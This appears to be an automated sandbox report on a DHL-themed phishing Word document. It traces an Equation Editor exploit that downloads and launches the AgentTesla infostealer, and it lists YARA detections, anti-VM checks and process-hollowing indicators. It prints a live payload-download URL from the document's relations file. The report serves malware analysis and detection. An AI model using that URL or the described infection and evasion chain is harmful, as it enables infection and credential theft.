Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\694BA9C1.doc, type: DROPPED Matched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\vbc[1].exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Yara signature match
Source: 10.2.vbc.exe.331cbe8.10.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 10.2.vbc.exe.331cbe8.10.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: 10.2.vbc.exe.32e69c8.9.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 10.2.vbc.exe.32e69c8.9.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: 10.2.vbc.exe.331cbe8.10.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 10.2.vbc.exe.331cbe8.10.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 10.2.vbc.exe.331cbe8.10.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: 10.2.vbc.exe.32ae9a8.11.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 10.2.vbc.exe.32ae9a8.11.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 10.2.vbc.exe.32ae9a8.11.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: 10.2.vbc.exe.32e69c8.9.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 10.2.vbc.exe.32e69c8.9.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 10.2.vbc.exe.32e69c8.9.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: 0000000A.00000002.967422759.00000000032AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: Process Memory Space: vbc.exe PID: 2192, type: MEMORYSTR Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\doc_200[1].doc, type: DROPPED Matched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\694BA9C1.doc, type: DROPPED Matched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
Detected potential crypto function
Source: C:\Users\Public\vbc.exe Code function: 10_2_00389118 10_2_00389118
Source: C:\Users\Public\vbc.exe Code function: 10_2_00386638 10_2_00386638
Source: C:\Users\Public\vbc.exe Code function: 10_2_00382790 10_2_00382790
Source: C:\Users\Public\vbc.exe Code function: 10_2_00389108 10_2_00389108
Source: C:\Users\Public\vbc.exe Code function: 10_2_0038962F 10_2_0038962F
Source: C:\Users\Public\vbc.exe Code function: 10_2_0038277B 10_2_0038277B
Source: C:\Users\Public\vbc.exe Code function: 10_2_00700960 10_2_00700960
Source: C:\Users\Public\vbc.exe Code function: 10_2_00720048 10_2_00720048
Source: C:\Users\Public\vbc.exe Code function: 10_2_003800C8 10_2_003800C8
Source: C:\Users\Public\vbc.exe Code function: 10_2_00380F32 10_2_00380F32
Document misses a certain OLE stream usually present in this Microsoft Office document type
Source: ~WRF{61C0FE69-632E-42B0-9EAB-CB8720AB2605}.tmp.0.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\vbc[1].exe 676A71156FF2422AF1B291E83030EF217607574E2EEB0344AF54A4CD7E99D8A8
Source: Joe Sandbox View Dropped File: C:\Users\Public\vbc.exe 676A71156FF2422AF1B291E83030EF217607574E2EEB0344AF54A4CD7E99D8A8
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Memory allocated: 77620000 page execute and read and write Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Memory allocated: 77740000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 77620000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 77740000 page execute and read and write Jump to behavior
Source: vbc[1].exe.9.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: vbc.exe.9.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: DHL_AWB.docx Virustotal: Detection: 22%
Source: DHL_AWB.docx ReversingLabs: Detection: 28%
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe" Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe Jump to behavior
Source: DHL_AWB.LNK.0.dr LNK file: ..\..\..\..\..\Desktop\DHL_AWB.docx
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$HL_AWB.docx Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVR55AD.tmp Jump to behavior
Source: classification engine Classification label: mal100.troj.expl.evad.winDOCX@16/25@0/1
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll Jump to behavior
Source: ~WRF{61C0FE69-632E-42B0-9EAB-CB8720AB2605}.tmp.0.dr OLE document summary: title field not present or empty
Source: ~WRF{61C0FE69-632E-42B0-9EAB-CB8720AB2605}.tmp.0.dr OLE document summary: edited time not present or 0
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\Public\vbc.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: DHL_AWB.docx Initial sample: OLE zip file path = word/embeddings/Microsoft_Excel_Worksheet1.xlsx
Source: DHL_AWB.docx Initial sample: OLE zip file path = word/_rels/settings.xml.rels
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: ~WRF{61C0FE69-632E-42B0-9EAB-CB8720AB2605}.tmp.0.dr Initial sample: OLE indicators vbamacros = False
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\Public\vbc.exe Code function: 10_2_00701281 pushfd ; ret 10_2_00701283
Source: C:\Users\Public\vbc.exe Code function: 10_2_00703B61 push ds; iretd 10_2_00703B69
Source: C:\Users\Public\vbc.exe Code function: 10_2_007210C0 push eax; retn 0062h 10_2_007210C1
Binary contains a suspicious time stamp
Source: vbc[1].exe.9.dr Static PE information: 0xBA9E5D5F [Tue Mar 19 17:46:07 2069 UTC]
Source: initial sample Static PE information: section name: .text entropy: 7.827553581420892
Source: initial sample Static PE information: section name: .text entropy: 7.827553581420892

Persistence and Installation Behavior
barindex
Contains an external reference to another file
Source: settings.xml.rels Extracted files from sample: http://198.23.207.54/shp/doc_200.doc
Drops PE files
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\vbc[1].exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Contains functionality to download and launch executables
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 9_2_036406B9 URLDownloadToFileW,ShellExecuteW,ExitProcess, 9_2_036406B9
Drops PE files to the user directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file

Boot Survival
barindex
Drops PE files to the user root directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Yara detected AntiVM3
Source: Yara match File source: 0000000A.00000002.967107263.0000000002446000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.966356766.00000000021F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: vbc.exe PID: 2192, type: MEMORYSTR
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: vbc.exe, 0000000A.00000002.967107263.0000000002446000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000A.00000002.966356766.00000000021F1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
Source: vbc.exe, 0000000A.00000002.967107263.0000000002446000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000A.00000002.966356766.00000000021F1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1696 Thread sleep time: -240000s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2632 Thread sleep time: -45877s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2484 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Contains long sleeps (>= 3 min)
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\Public\vbc.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 45877 Jump to behavior
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: vbc.exe, 0000000A.00000002.966356766.00000000021F1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: vbc.exe, 0000000A.00000002.966356766.00000000021F1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmware
Source: EQNEDT32.EXE, 00000009.00000002.942076557.000000000098F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: vbc.exe, 0000000A.00000002.966356766.00000000021F1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware SVGA II
Source: vbc.exe, 0000000A.00000002.966356766.00000000021F1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
Enables debug privileges
Source: C:\Users\Public\vbc.exe Process token adjusted: Debug Jump to behavior
Contains functionality to read the PEB
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 9_2_03640713 mov edx, dword ptr fs:[00000030h] 9_2_03640713
Source: C:\Users\Public\vbc.exe Memory allocated: page read and write | page guard Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe" Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe Jump to behavior
Queries the volume information (name, serial number etc) of a device
